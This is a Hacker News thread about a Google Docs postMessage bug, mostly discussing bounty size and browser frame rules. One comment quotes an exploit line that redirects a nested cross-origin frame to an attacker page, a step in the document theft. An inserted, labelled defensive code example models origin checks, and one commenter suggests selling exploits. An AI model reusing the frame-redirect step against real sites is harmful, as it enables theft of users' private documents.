Stealing private documents through a bug in Google Docs

319 points by hackerpain, over 4 years ago

10 comments

jackconsidine, over 4 years ago
A few years ago, I built a platform for a client that allowed his customers to show a "Text Me" widget on their websites; the software handled all of the SMS / messaging and basically substituted conventional contact form or Intercom integration.

His customers used Google AdSense, who started blocking them until they removed the widget. The reason? This widget used an Iframe postMessage, but appropriately specified the singular sandboxed domain. As expected, we never were able to speak with a human at Google; they just sent my client's customers intimidating emails about a security flaw on their websites.

Seeing Google abuse the postMessage API with a wildcard argument after this fiasco is maddening! If only they were held to their own arbitrary and vague standards.

xyst, over 4 years ago
This was a bug that affected multiple products and even crossed into the enterprise suite and Google only rewarded $3.3K USD?

It's almost as bad as Apple's reward program

twiss, over 4 years ago
The most surprising part to me is that this works:

    window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";

It's expected to me that you can change `window.frames[0].location`, since you can also change the "src" attribute of the iframe element. But you can't change the "src" attribute of an iframe inside that iframe, if it's not same-origin - so why can you change its location?

Maybe we should look into whether changing this would break any websites.
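
Added example, not part of any comment in this thread or of the original write-up: a small Node.js model of the postMessage delivery rule behind the wildcard argument jackconsidine mentions and the frame navigation twiss describes, with a pinned-origin sender and an allowlisting receiver. `FrameModel`, `sendPinned`, `makeReceiver` and the `.example`/`.test` origins are hypothetical names constructed for illustration.

```javascript
// Model of a browsing context: it has a current location and an inbox.
class FrameModel {
  constructor(url) { this.location = url; this.inbox = []; }
  get origin() { return new URL(this.location).origin; }
  // Delivery rule modelled on the browser: a message is delivered only if
  // targetOrigin is "*" or equals the origin of the document currently loaded.
  postMessage(data, targetOrigin) {
    if (targetOrigin !== "*" && new URL(targetOrigin).origin !== this.origin) {
      return false; // dropped, the frame never sees the data
    }
    this.inbox.push(data);
    return true;
  }
}

// Sender-side hardening: never send without a concrete expected origin.
function sendPinned(frame, data, expectedOrigin) {
  if (!expectedOrigin || expectedOrigin === "*") {
    throw new Error("refusing wildcard targetOrigin");
  }
  return frame.postMessage(data, expectedOrigin);
}

// Receiver-side hardening: exact-match allowlist on event.origin
// (no substring or prefix checks, which look-alike hosts can satisfy).
function makeReceiver(allowedOrigins, handler) {
  const allowed = new Set(allowedOrigins);
  return (event) => {
    if (!allowed.has(event.origin)) return false;
    handler(event.data);
    return true;
  };
}

function demo() {
  const TRUSTED = "https://widget.example"; // constructed origin
  const frame = new FrameModel(TRUSTED + "/embed");
  // The embedded frame ends up on a different origin than the sender expects.
  frame.location = "https://other.example/page";
  const wildcardDelivered = frame.postMessage({ secret: "doc" }, "*");
  const pinnedDelivered = sendPinned(frame, { secret: "doc" }, TRUSTED);
  const seen = [];
  const receive = makeReceiver([TRUSTED], (d) => seen.push(d));
  const accepted = receive({ origin: TRUSTED, data: "ok" });
  const rejected = receive({ origin: "https://widget.example.evil.test", data: "x" });
  return { wildcardDelivered, pinnedDelivered, inboxSize: frame.inbox.length,
           accepted, rejected, seen };
}
```
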

diveanon, over 4 years ago
To the people publishing these exploits and collecting the trivial bounties.

Hats off to you, no idea why you wouldn't just sell this off considering how poorly your honesty is rewarded.

mettamage, over 4 years ago
Curious question, if you find a few vulnerabilities like this, does it mean that you could get hired by Google to do this internally?

What I'm trying to ask is: does this make the hiring process easier?

random5634, over 4 years ago
Good lord, $3K for this?

These companies give two craps about security.

paulmendoza, over 4 years ago
Google should have awarded a much larger value to this. Like $100k. This is a serious flaw.

konschubert, over 4 years ago
Client-side encryption really decreases the attack surfaces of cloud storage solutions.

It's really sad that Keybase failed at building a business around this. Hopefully someone else is going to make another attempt.

Geeky-cat, over 4 years ago
Thanks for going through the write-up. As an author of the bug, considering the impact, user interaction required and other criteria that need to line up to exploit this bug I feel Google VRP's decision on this bug is accurate.

BlackPlot, over 4 years ago
TBO not surprised at all Gdocs had an issue